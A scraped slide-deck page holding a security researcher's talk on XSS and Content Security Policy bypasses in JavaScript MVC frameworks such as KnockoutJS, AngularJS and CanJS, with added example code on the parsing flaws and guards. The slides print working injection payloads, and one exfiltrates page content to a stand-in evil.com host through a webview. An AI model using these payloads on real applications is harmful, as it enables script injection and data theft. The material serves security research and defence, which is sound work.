Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks

  • 1. JSMVCOMFG To sternly look at JavaScript MVC and Templating Frameworks A presentation by Mario Heiderich mario@cure53.de || @0x6D6172696F
  • 2. Infosec Hobgoblin
    ● Dr.-Ing. Mario Heiderich
    ● Researcher and Post-Doc, Ruhr-Uni Bochum
      – PhD Thesis on Client Side Security and Defense
    ● Founder of Cure53
      – Penetration Testing Firm
      – Consulting, Workshops, Trainings
      – Simply the Best Company of the World
    ● Published author and international speaker
      – Specialized in HTML5 and SVG Security
      – JavaScript, XSS and Client Side Attacks
    ● HTML5 Security Cheatsheet
    ● And something new!
      – @0x6D6172696F
      – mario@cure53.de
  • 3. Today ● JavaScript MVC & Templating Frameworks ● Why? Because they are becoming popular ● Yes, we have numbers, wait for it... ● And they are special ● Are there security flaws? ● If yes (heh.. if..) what can we learn from them?
  • 5. What are they
    ● Written in JavaScript
    ● Often huge
    ● Often very complex
    ● Often maintained by corporations
    ● Interfaces to enable different coding styles
    ● Extending, optimizing, changing
      – The way developers work with JavaScript
      – The way web applications used to work
  • 7. What do they do?
    ● Claims
      – “More productive out of the box” (EmberJS)
      – “AngularJS lets you extend HTML vocabulary for your application” (AngularJS)
      – “Fast templates, responsive widgets” (CanJS)
      – “Simple and intuitive, powerful and extensible, lightning fast” (JsRender)
  • 8. Examples (EmberJS)
    <script type="text/x-handlebars">
      {{outlet}}
    </script>
    <script type="text/x-handlebars" id="x">
      <h1>People</h1>
      <ul>
      {{#each model}}
        <li>Hello, <b>{{fullName}}</b>!</li>
      {{/each}}
      </ul>
    </script>

    App = Ember.Application.create();
    App.Person = Ember.Object.extend({
      firstName: null, lastName: null,
      fullName: function() {
        return this.get('firstName') + " " + this.get('lastName');
      }.property('firstName', 'lastName')
    });
    App.IndexRoute = Ember.Route.extend({
      model: function() {
        var people = [
          App.Person.create({ firstName: "Frank", lastName: "N. Stein" })
        ];
        return people;
      }
    });
  • 9. Examples (AngularJS)
    <!doctype html>
    <html ng-app>
    <head>
      <script src="angular.min.js"></script>
    </head>
    <body>
      <div>
        <label>Name:</label>
        <input type="text" ng-model="yourName" placeholder="Your name">
        <hr>
        <h1>Hello {{yourName}}!</h1>
      </div>
    </body>
    </html>
  • 10. Examples (KnockoutJS)
    <div class="liveExample" id="x">
      <select data-bind="options: tickets, optionsCaption: 'Choose...', optionsText: 'name', value: chosenTicket">
        <option value="">Economy</option>
        <option value="">Business</option>
        <option value="">First Class</option>
      </select>
      <button data-bind="enable: chosenTicket, click: resetTicket" disabled="">Clear</button>
      <p data-bind="with: chosenTicket"></p>
      <script type="text/javascript">
        function TicketsViewModel() {
          this.tickets = [
            { name: "Economy", price: 199.95 },
            { name: "Business", price: 449.22 },
            { name: "First Class", price: 1199.99 }
          ];
          this.chosenTicket = ko.observable();
          this.resetTicket = function() { this.chosenTicket(null) }
        }
        ko.applyBindings(new TicketsViewModel(), document.getElementById("x"));
      </script>
    </div>
    Callouts on the slide: “Binding stuff” (the data-bind attributes), “Raw Data!” (the view model), “Puttin' it togetha” (ko.applyBindings).
  • 11. So..
    ● JSMVC Frameworks do the following
      – They extend the DOM
      – They “abstractify” the DOM
      – They provide new interfaces
      – They often use script-templates or “data blocks”
        ● “The script element allows authors to include dynamic script and data blocks in their documents.” (WHATWG; “HTML5 Approved!”)
        ● Sometimes ERB-style
        ● Often Mustache-style
        ● Sometimes something completely different
      – They often use markup-sugar
        ● Custom elements, <hellokitty>
        ● HTML5 data attributes
  • 14. Mustache
    ● Specified in 2009 by Wanstrath
    ● {{ stuff }}
    ● {{#is_true}} Bla {{/is_true}}
  • 15. JSMVC and Security
    ● Initial rationale for security research
      – It's trending, it's complex, it's different
      – What else do we need... nothing
    ● Poke-first, analyze later
      – Pick a target, thanks TodoMVC!
      – Explore debugging possibilities
      – Goal: Execute arbitrary JavaScript, maybe more
        ● Using otherwise uncommon ways
        ● Using the JSMVC capabilities
      – Assume injection, assume conventional XSS filter
    ● After poking, derive a metric for JSMVC security
  • 16. Pokes
    ● Why not start with KnockoutJS
    <script src="knockout-2.3.0.js"></script>
    <div data-bind="x:alert(1)" />
    <script>
      ko.applyBindings();
    </script>
  • 17. Wait...
    ● JavaScript from within a data-attribute?
    ● No extra magic, just the colon?
    ● That's right
    ● See where we are heading with this?
    ● Knockout knocks out XSS filters
      – Chrome's XSS Auditor
      – IE's XSS Filter
      – Anything that allows data attributes
    ● This behavior breaks existing security assumptions!
  • 19. The reason
    ● “eval” via “Function”
    parseBindingsString: function(b, c, d) {
      try {
        var f;
        if (!(f = this.Na[b])) {
          var g = this.Na, e,
              m = "with($context){with($data||{}){return{" + a.g.ea(b) + "}}}";
          e = new Function("$context", "$element", m);
          f = g[b] = e
        }
        return f(c, d)
      } catch (h) {
        throw h.message = "Unable to parse bindings.\nBindings value: " + b + "\nMessage: " + h.message, h;
      }
    }
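The mechanism on slide 19, reduced to its essentials as an added example (this is not Knockout's code, and the lookup-only parser and the canary probe are this example's own): the attribute value is spliced into an object literal and compiled with the Function constructor, so the data-bind attribute is an eval with extra steps. The probe is a practical way to answer metric SEC-A from slide 53 for any engine that exposes a parse function; the same probe, with the engine's own delimiters, applies to the CanJS and Kendo cases on slides 20 to 22.

```javascript
// Added example, not KnockoutJS code: a miniature reconstruction of the
// binding parser on slide 19, a lookup-only parser for contrast, and a
// canary probe for metric SEC-A ("are template expressions an eval?").

// Same shape as Knockout 2.x parseBindingsString: the attribute value is
// spliced into an object literal and compiled with the Function constructor.
// The two `with` blocks only decide where free identifiers resolve first
// (the binding context, then the view model); nothing limits what runs.
// Knockout additionally pre-processes the string and caches the compiled
// function per binding string; both are omitted here.
function knockoutStyleParse(bindingString, data) {
  var body = "with($context){with($data||{}){return{" + bindingString + "}}}";
  var fn = new Function("$context", "$element", body); // eval by another name
  return fn({ $data: data }, null);
}

// A parser that accepts only "bindingName: propertyName" and resolves the
// property with an own-property lookup. No code is compiled from the attribute.
function lookupOnlyParse(bindingString, data) {
  var bindings = {};
  bindingString.split(",").forEach(function (pair) {
    var m = /^\s*([A-Za-z_$][\w$]*)\s*:\s*([A-Za-z_$][\w$]*)\s*$/.exec(pair);
    if (!m) throw new SyntaxError("unsupported binding: " + pair.trim());
    bindings[m[1]] = Object.prototype.hasOwnProperty.call(data, m[2]) ? data[m[2]] : undefined;
  });
  return bindings;
}

// SEC-A probe: a binding whose value calls a canary known only to the probe.
// If the canary fires, whoever controls the attribute controls the page.
function probeEvalEquivalent(parse) {
  var fired = false;
  var data = { name: "Frank", canary: function () { fired = true; return 1; } };
  try {
    parse("text: name, x: canary()", data);
  } catch (e) {
    // Rejecting the expression outright is the safe outcome.
  }
  return fired;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("knockout-style parser eval-equivalent:", probeEvalEquivalent(knockoutStyleParse)); // true
  console.log("lookup-only parser eval-equivalent:   ", probeEvalEquivalent(lookupOnlyParse));    // false
}
```

The probe deliberately passes `canary` inside the view model, because that is the one place a lookup-only parser is allowed to read from; only a parser that turns the attribute into code can get from the bare name to a call. Note that the lookup-only variant also refuses to resolve inherited keys such as `constructor`, which matters for the Angular case later in the deck.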
  • 20. Keep pokin'
    ● CanJS for example
    <script src="jquery-2.0.3.min.js"></script>
    <script src="can.jquery.js"></script>
    <body>
      <script type="text/ejs" id="todoList">
        <%==($a)->abc})-alert(1)-can.proxy(function(){%>
      </script>
      <script>
        can.view('todoList', {});
      </script>
    </body>
  • 21. Reason
    ● A copy of “eval” called “myEval”
    myEval = function(script) {
      eval(script);
    },
    [...]
    var template = buff.join(''),
        out = {
          out: 'with(_VIEW) { with (_CONTEXT) {' + template + " " + finishTxt + "}}"
        };
    // Use `eval` instead of creating a function, because it is easier to debug.
    myEval.call(out, 'this.fn = (function(_CONTEXT,_VIEW){' + out.out + '});\r\n//@ sourceURL=' + name + ".jjs");
    return out;
  • 22. And even more... (Kendo UI)
    <script src="jquery-1.7.1.min.js"></script>
    <script src="kendo.all.min.js"></script>
    <div id="x"># alert(1) #</div>
    <script>
      var template = kendo.template($("#x").html());
      var tasks = [{ id: 1 }];
      var dataSource = new kendo.data.DataSource({ data: tasks });
      dataSource.bind("change", function(e) {
        var html = kendo.render(template, this.view());
      });
      dataSource.read();
    </script>
  • 23. Keeeeep Pokin'
    ● AngularJS 1.1.x
    <script src="angular.min.js"></script>
    <div class="ng-app">
      {{constructor.constructor('alert(1)')()}}
    </div>
    ● Or this – even with encoded mustaches
    <script src="angular.min.js"></script>
    <div class="ng-app">
      &#x7b;&#x7b;constructor.constructor('alert(1)')()&#x7d;&#x7d;
    </div>
  • 24. Reason
    ● “eval” via “Function”
    var code = 'var l, fn, p;\n';
    forEach(pathKeys, function(key, index) {
      code += 'if(s === null || s === undefined) return s;\n' +
              'l=s;\n' +
              's=' + (index
                      // we simply dereference 's' on any .dot notation
                      ? 's'
                      // but if we are first then we check locals first, and if so read it first
                      : '((k&&k.hasOwnProperty("' + key + '"))?k:s)') +
              '["' + key + '"]' + ';\n' +
              […]
              '}\n' +
              ' s=s.$$v\n' +
              '}\n';
    });
    code += 'return s;';
    fn = Function('s', 'k', code); // s=scope, k=locals
    fn.toString = function() { return code; };
  • 25. Sadly for the attacker...
    ● They fixed it in 1.2.x
    ● Dammit!
    ● Good test-cases too! Look...
    function ensureSafeObject(obj, fullExpression) {
      // nifty check if obj is Function that is fast … other contexts
      if (obj && obj.constructor === obj) {
        throw $parseMinErr('isecfn',
            'Referencing Function in Angular expressions is disallowed!\nExpression: {0}',
            fullExpression);
      } else {
        return obj;
      }
    }
  • 26. Not that hard to solve
    var foo = {};
    foo.bar = 123;
    foo.baz = 456;
    console.log(foo.hasOwnProperty('bar'));         // true
    console.log(foo.hasOwnProperty('baz'));         // true
    console.log(foo.hasOwnProperty('constructor')); // false
    console.log(foo.hasOwnProperty('__proto__'));   // false
    console.log(foo.hasOwnProperty('prototype'));   // false
  • 28. CSP ● Most of the JSMVC will not work with CSP ● At least not without unsafe-eval ● That's not gonna help evangelize CSP ● Although there's hope – AngularJS
  • 29. <div ng-app ng-csp>
  • 30. AngularJS
    ● Features a special CSP mode
    ● Said to be 30% slower
    ● But enables AngularJS to work
      – Even without unsafe-eval or other nasties
      – Magick!
    ● It also brings back script injections
  • 31. Proper CSP!
    <?php
    header("X-Content-Security-Policy: default-src 'self'");
    header("Content-Security-Policy: default-src 'self'");
    header("X-Webkit-CSP: default-src 'self'");
    ?>
    <!doctype html>
    <html ng-app ng-csp>
    <head>
      <script src="angular.min.js"></script>
    </head>
    <body onclick="alert(1)">
      Click me
      <h1 ng-mouseover="$event.view.alert(2)">
        Hover me
      </h1>
    </body>
    </html>
    The inline onclick handler is blocked by the policy; the ng-mouseover attribute is not.
  • 32. How do they do it?
    I. Parse the “ng”-attributes
    II. Slice out the relevant parts
    III. Create anonymous functions
    IV. Connect them with events
    V. Wait for event handler to fire
    $element.onclick=function($event){ $event['view']['alert']('1') }
    ● It's technically not in-line
    ● Neither is any “eval” being used
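The five steps on slide 32, and the guard ideas from slides 25 and 26, as one added example (this is not AngularJS code; the tokenizer, the fake window object, the attribute strings and the guard are this example's own). It shows why CSP does not help: the attribute value is walked object by object and called through `Function.prototype.apply`, so no inline script and no eval is ever involved, yet `$event.view.alert(2)` still reaches `window.alert`. It also shows what the slide 23 payload does when the walker follows inherited properties, and that the `obj.constructor === obj` check plus own-property walking stops that particular path.

```javascript
// Added example, not AngularJS code: a toy "ng-csp style" compiler that
// runs the expression from an ng-* attribute without new Function or eval,
// plus the Function / own-property guard from slides 25 and 26.

// Tokens: identifiers, '.', '(', ')', ',', single-quoted strings, integers.
function tokenize(src) {
  var re = /\s*(?:([A-Za-z_$][\w$]*)|'((?:[^'\\]|\\.)*)'|(\d+)|([.(),]))/y;
  var tokens = [];
  src = src.trim();
  while (re.lastIndex < src.length) {
    var m = re.exec(src);
    if (!m) throw new SyntaxError("bad token in expression: " + src);
    if (m[1] !== undefined) tokens.push({ t: "id", v: m[1] });
    else if (m[2] !== undefined) tokens.push({ t: "str", v: m[2] });
    else if (m[3] !== undefined) tokens.push({ t: "num", v: Number(m[3]) });
    else tokens.push({ t: m[4] });
  }
  return tokens;
}

// Slide 25's check: Function is the only object whose constructor is itself.
function ensureSafeObject(obj, expr) {
  if (obj && obj.constructor === obj) {
    throw new Error("Referencing Function in expressions is disallowed: " + expr);
  }
  return obj;
}

// Slide 26's idea: follow own properties only, so constructor, __proto__ and
// prototype never resolve through the prototype chain.
function readProp(obj, key, guarded) {
  if (obj === null || obj === undefined) return undefined;
  if (!guarded) return obj[key];
  if (!Object.prototype.hasOwnProperty.call(obj, key)) return undefined;
  return ensureSafeObject(obj[key], key);
}

// Evaluates a member/call chain such as $event.view.alert(2) by walking
// objects and applying functions; no source text is handed to the engine.
function evaluate(src, scope, guarded) {
  var toks = tokenize(src), i = 0;
  function peek() { return toks[i]; }
  function expr() {
    var tok = toks[i++];
    if (!tok) throw new SyntaxError("empty expression");
    var holder = scope, value;
    if (tok.t === "id") value = readProp(scope, tok.v, guarded);
    else if (tok.t === "str" || tok.t === "num") value = tok.v;
    else throw new SyntaxError("unexpected token " + tok.t);
    while (peek()) {
      if (peek().t === ".") {
        i++;
        var key = toks[i++];
        if (!key || key.t !== "id") throw new SyntaxError("expected property name");
        holder = value;                            // receiver for a later call
        value = readProp(value, key.v, guarded);
      } else if (peek().t === "(") {
        i++;
        var args = [];
        while (peek() && peek().t !== ")") {
          args.push(expr());
          if (peek() && peek().t === ",") i++;
        }
        if (!peek()) throw new SyntaxError("missing )");
        i++;
        if (typeof value !== "function") throw new TypeError("not a function: " + src);
        value = value.apply(holder, args);
        if (guarded) ensureSafeObject(value, src);
      } else {
        break;
      }
    }
    return value;
  }
  var result = expr();
  if (i !== toks.length) throw new SyntaxError("unexpected trailing tokens in " + src);
  return result;
}

// Steps III to V of slide 32: the attribute becomes an anonymous function
// attached as an event handler. CSP sees neither inline script nor eval.
function compileHandler(attrValue, guarded) {
  return function ($event) {
    return evaluate(attrValue, { $event: $event }, guarded);
  };
}

if (typeof require !== "undefined" && require.main === module) {
  var win = { alerts: [], alert: function (x) { this.alerts.push(x); } }; // stand-in for window
  var el = {};
  el.onmouseover = compileHandler("$event.view.alert(2)", true);
  el.onmouseover({ view: win });
  console.log("guarded, still reaches window.alert:", win.alerts);          // [ 2 ]
  console.log(evaluate("constructor.constructor('return 42')()", {}, false)); // 42
  try { evaluate("constructor.constructor('return 42')()", {}, true); }
  catch (e) { console.log("guarded:", e.message); }
}
```

Two things to take from it. First, the guard does nothing against the CSP case: `$event.view.alert` is a chain of own properties, so the harmful expression is indistinguishable from a legitimate one, and the only fix is to keep attacker-controlled attributes out of anything the compiler walks. Second, own-property walking as on slide 26 breaks legitimate lookups of prototype members (`document.createElement` is one), which is why the real AngularJS sandbox used allow- and deny-checks on specific objects instead; those were bypassed repeatedly, and the expression sandbox was removed in AngularJS 1.6 with the statement that it had never been a security boundary.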
  • 33. So, enabling the JSMVC to work with CSP (partly) kills the protection CSP delivers? Aw, yeah, being a pen-tester these days!
  • 34. “Packaged apps deliver an experience as capable as a native app, but as safe as a web page. Just like web apps, packaged apps are written in HTML5, JavaScript, and CSS.” Uhm...
  • 35. “Packaged apps have access to Chrome APIs and services not available to traditional web sites. You can build powerful apps that interact with network and hardware devices, media tools, and much more.” :-O
  • 36. It's bad “Ever played with Chrome Packaged Apps?” ● Very powerful tools ● Similar yet not equivalent to extensions ● Melting the barrier between web and desktop ● HTML + JS + many APIs ● CSP enabled by default ● And work great with AngularJS (of course)
  • 37. Doing the Nasty ● Let's bypass CSP in CPA using Angular ● And escalate some privileges
  • 38. Benign: The HTML of our fancy app
    <!doctype html>
    <html ng-app ng-csp>
    <head>
      <script src="angular.min.js"></script>
      <script src="controller.js"></script>
      <link rel="stylesheet" href="todo.css">
    </head>
    <body>
      <h2>Todo</h2>
      <div ng-controller="TodoCtrl">
        <span>{{remaining()}} of {{todos.length}} remaining</span>
        [ <a href="" ng-click="archive()">archive</a> ]
        <ul class="unstyled">
          <li ng-repeat="todo in todos">
            <input type="checkbox" ng-model="todo.done">
            <span class="done-{{todo.done}}">{{todo.text}}</span>
          </li>
        </ul>
      </div>
    </body>
    </html>
  • 39. Benign: Our Controller Code, AngularJS
    function TodoCtrl($scope) {
      $scope.todos = [
        {text:'learn angular', done:true},
        {text:'build an angular app', done:false}];
      $scope.remaining = function() {
        var count = 0;
        angular.forEach($scope.todos, function(todo) {
          count += todo.done ? 0 : 1;
        });
        return count;
      };
      $scope.archive = function() {
        var oldTodos = $scope.todos;
        $scope.todos = [];
        angular.forEach(oldTodos, function(todo) {
          if (!todo.done) $scope.todos.push(todo);
        });
      };
    }
  • 40. Benign: The Manifest, Permissions too
    {
      "manifest_version": 2,
      "name": "Lab3b MVC with controller",
      "permissions": ["webview"],
      "version": "1",
      "app": {
        "background": {
          "scripts": ["main.js"]
        }
      },
      "icons": { "128": "icon.png" }
    }
  • 41. Attacked
    <!doctype html>
    <html ng-app ng-csp>
    <head>
      <script src="angular.min.js"></script>
      <script src="controller.js"></script>
      <link rel="stylesheet" href="todo.css">
    </head>
    <body>
      <h2 ng-click="invalid(
          w=$event.view,
          x=w.document.createElement('webview'),
          x.src='http://evil.com/?'+w.btoa(w.document.body.innerHTML),
          w.document.body.appendChild(x)
      )">Todo-shmoodoo</h2>
      <div ng-controller="TodoCtrl">
        <span>{{remaining()}} of {{todos.length}} remaining</span>
        [ <a href="" ng-click="archive()">archive</a> ]
        <ul class="unstyled">
          <li ng-repeat="todo in todos">
            <input type="checkbox" ng-model="todo.done">
            <span class="done-{{todo.done}}">{{todo.text}}</span>
          </li>
        </ul>
      </div>
    </body>
    </html>
    Oh, Sh*t!
  • 45. Happy testing – there's a lot more to find!
  • 46. For example this... <div class="ng-include:'//ø.pw'">
  • 47. More CSP Bypasses
    ● And even a much better one
      – Upload a GIF
      – Inject a class attribute
      – Get a free AngularJS + HTML5 CSP Bypass
    ● Wanna see?
  • 48. Let's upload a pic!
    ● It's a valid GIF but also contains payload – including the image as HTML!
    ● Now we inject a class attribute
      <span class="ng-include:'test.gif'"> </span>
    ● Now it imports itself
      <link rel="import" href="test.gif">
    ● Thereby loads itself as JS
      <script src="test.gif"></script>
    ● “And pop goes the weasel”
  • 49. “It looks like we will agree to disagree on the importance of the HTML imports issue -- we don't think it's possible for a third party to execute arbitrary Javascript via the process you describe, so the risk of unsanitized HTML would be one that the developer was taking on deliberately.”
  • 50. Quick Recap
    ● What have we seen today
      – Rotten Markup-Sugar
      – JavaScript exec. from data-attributes
      – JavaScript exec. from any element
      – JavaScript exec. within encoded mustache
      – A full-blown CSP Bypass
      – The reasons for all these: lots of “eval” and bad coding practices
      – Oh – and an attack against Chrome Packaged Apps
    ● And it was just the tip of the iceberg
  • 53. Metrics
    ● While root causes persist, new challenges arise
    ● We need to build metrics
    ● After having analyzed 12 frameworks: Here's a proposal
    {}SEC-A Are template expressions equivalent to a JavaScript eval?
    {}SEC-B Is the execution scope well isolated or sand-boxed?
    {}SEC-C Can arbitrary HTML elements serve as template containers?
    {}SEC-D Does the framework allow, encourage or even enforce separation of code and content?
    {}SEC-E Does the framework maintainer have a security response program?
    {}SEC-F Does the framework allow safe CSP rules to be used?
  • 55. Conclusion
    ● JSMVC requires new security requirements
      – No reflected content from the server within template containers
      – Sometimes, everything is a template container
      – Strict separation is necessary
    ● And there is hope!
      – Maybe JSMVC eliminates XSS
      – Because it changes how we design applications
      – And does so by boosting and not hindering productivity
    ● Interested in collaborating on this? Contact me!